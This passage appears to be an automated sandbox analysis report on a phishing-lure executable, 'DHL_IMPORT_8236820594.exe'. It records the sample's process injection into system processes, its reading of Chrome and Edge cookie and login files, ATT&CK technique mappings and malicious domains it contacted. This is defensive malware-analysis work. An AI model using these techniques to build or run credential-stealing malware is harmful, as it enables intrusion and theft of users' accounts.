                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00830B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00802622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007F083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007F09D5 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007F0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtTerminateProcess: Direct from: 0x76F02D5C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe | Thread register set: target process: 3756
                Source: C:\Windows\SysWOW64\net.exe | Thread APC queued: target process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2FD3008
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00831201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00812BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0083B226 SendInput,keybd_event
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_008522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Process created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00830B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00831663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: DHL_IMPORT_8236820594.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: DHL_IMPORT_8236820594.exe, AUHJGnjYgKTjWw.exe, 00000005.00000002.3518168062.0000000001130000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000000.2012880044.0000000001131000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518170839.0000000001200000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: AUHJGnjYgKTjWw.exe, 00000005.00000002.3518168062.0000000001130000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000000.2012880044.0000000001131000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518170839.0000000001200000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: AUHJGnjYgKTjWw.exe, 00000005.00000002.3518168062.0000000001130000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000000.2012880044.0000000001131000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518170839.0000000001200000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: AUHJGnjYgKTjWw.exe, 00000005.00000002.3518168062.0000000001130000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000000.2012880044.0000000001131000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518170839.0000000001200000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007F0698 cpuid
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00848195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0082D27A GetUserNameW
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0080BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: DHL_IMPORT_8236820594.exe | Binary or memory string: WIN_81
                Source: DHL_IMPORT_8236820594.exe | Binary or memory string: WIN_XP
                Source: DHL_IMPORT_8236820594.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: DHL_IMPORT_8236820594.exe | Binary or memory string: WIN_XPe
                Source: DHL_IMPORT_8236820594.exe | Binary or memory string: WIN_VISTA
                Source: DHL_IMPORT_8236820594.exe | Binary or memory string: WIN_7
                Source: DHL_IMPORT_8236820594.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00851204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00851806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (one line per tactic; techniques listed in the order they appear in the matrix, with the number shown beside each technique kept as in the report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: 1 Native API; 1 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
                Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1547007 | Sample: DHL_IMPORT_8236820594.exe | Startdate: 01/11/2024 | Architecture: WINDOWS | Score: 100

                Start (node 2)
                  DNS/IP: www.iuyi542.xyz; www.vrxlzluy.shop; 13 other IPs or domains
                  Signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 4 other signatures
                  Signature on www.iuyi542.xyz: Performs DNS queries to domains with low reputation
                  started: DHL_IMPORT_8236820594.exe 1 (node 10)
                DHL_IMPORT_8236820594.exe (node 10)
